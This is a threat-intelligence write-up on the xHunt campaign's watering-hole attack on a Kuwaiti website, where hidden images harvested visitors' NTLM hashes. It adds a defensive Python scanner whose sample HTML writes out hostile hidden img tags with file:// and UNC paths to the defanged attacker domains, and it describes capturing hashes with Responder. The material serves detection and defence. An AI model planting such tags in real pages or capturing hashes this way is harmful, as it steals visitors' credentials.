The xHunt campaign is known to have been active since July 2018, targeting transportation and shipping organizations based in Kuwait.
The campaign was named xHunt because the tools are named after characters from the series Hunter x Hunter.
xHunt Campaign Activities
Unit 42 researchers spotted a new xHunt attack campaign that compromised a Kuwaiti organization’s webpage and used it as a watering hole.
The attackers stored hidden image files on the website between June and December 2019. Earlier these referenced microsofte-update[.]com; later they were changed to learn-service[.]com.
The attack aimed to harvest account credentials, in the form of NTLM hashes, from the webpage’s visitors.
With the NTLM handshake and other information, they could crack the hashes to obtain the username and password, or launch a relay attack.
To test further, the researchers set up the Responder tool on a server and configured the environment so that the domain microsofte-update[.]com resolved to that server.
“We then visited the website from another system in our lab that had the HTML code injected and observed the Responder tool gathering the domain name, user name, IP address and NTLM hashes from the system on which we visited the website.”
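From the defender’s side, the injected content described above can be hunted for in a site’s own HTML: an <img> tag that is hidden and whose source points at an outside host, especially a file:// or UNC-style path, which makes Windows clients attempt SMB authentication and thereby leak NTLM hashes. The scanner below is an added example, not Unit 42’s tooling; the sample HTML, the site host name and the assumption that the images used file://-style sources are constructed, while the two domains come from the article (kept defanged).

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample page: one legitimate image and two hidden images whose
# sources point at the domains named in the article (defanged with [.]).
SAMPLE_HTML = """
<html><body>
<img src="/static/logo.png" width="120" height="40">
<img src="file://\\\\microsofte-update[.]com\\share\\x.png" style="display:none">
<img src="\\\\learn-service[.]com\\c$\\pixel.gif" width="0" height="0">
</body></html>
"""

# Matches \\host\..., //host/..., file://host/... and file://\\host\... forms.
_UNC_RE = re.compile(r"^(?:file:)?[/\\]{2,}([^/\\?#]+)", re.I)

class ImgCollector(HTMLParser):
    """Collects the attribute dict of every <img> tag in the document."""
    def __init__(self):
        super().__init__()
        self.images = []
    def handle_starttag(self, tag, attrs):
        if tag.lower() == "img":
            self.images.append(dict(attrs))

def _is_hidden(attrs):
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    return attrs.get("width") == "0" or attrs.get("height") == "0"

def _remote_host(src):
    """Host the client would contact for this src, or None for same-site paths."""
    parts = urlsplit(src.strip())
    if parts.scheme in ("http", "https"):
        return parts.hostname
    m = _UNC_RE.match(src.strip())
    if m and not m.group(1).endswith(":"):  # file:///C:/x is a local drive, not a host
        return m.group(1).lower()            # UNC/file host: triggers SMB auth on Windows
    return None

def find_suspicious_images(html, site_host):
    """Return [(src, [reasons])] for images that are hidden and/or point off-site."""
    collector = ImgCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.images:
        src = attrs.get("src", "")
        host = _remote_host(src)
        reasons = []
        if host and host != site_host:
            reasons.append("external host " + host)
        if _is_hidden(attrs):
            reasons.append("hidden")
        if reasons:
            findings.append((src, reasons))
    return findings
```

Run against a copy of the site’s pages on a schedule and alert on any finding whose host is not the site itself; the legitimate logo in the sample produces no finding.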
Further DNS analysis of the Kuwaiti organization’s webpage revealed that another organization within Kuwait began resolving to infrastructure used by the xHunt operators.
Here is the DNS activity timeline of the Sakabota and Hisoka DNS infrastructure, read as follows:
- Top row – targeted organizations
- Middle row – Infrastructure
- Bottom row – xHunt domains
The attackers also obtained Let’s Encrypt SSL certificates containing the name of the redirected domain.
Researchers believe the same threat actor group is behind both the Hisoka attack campaign and the xHunt attack campaign.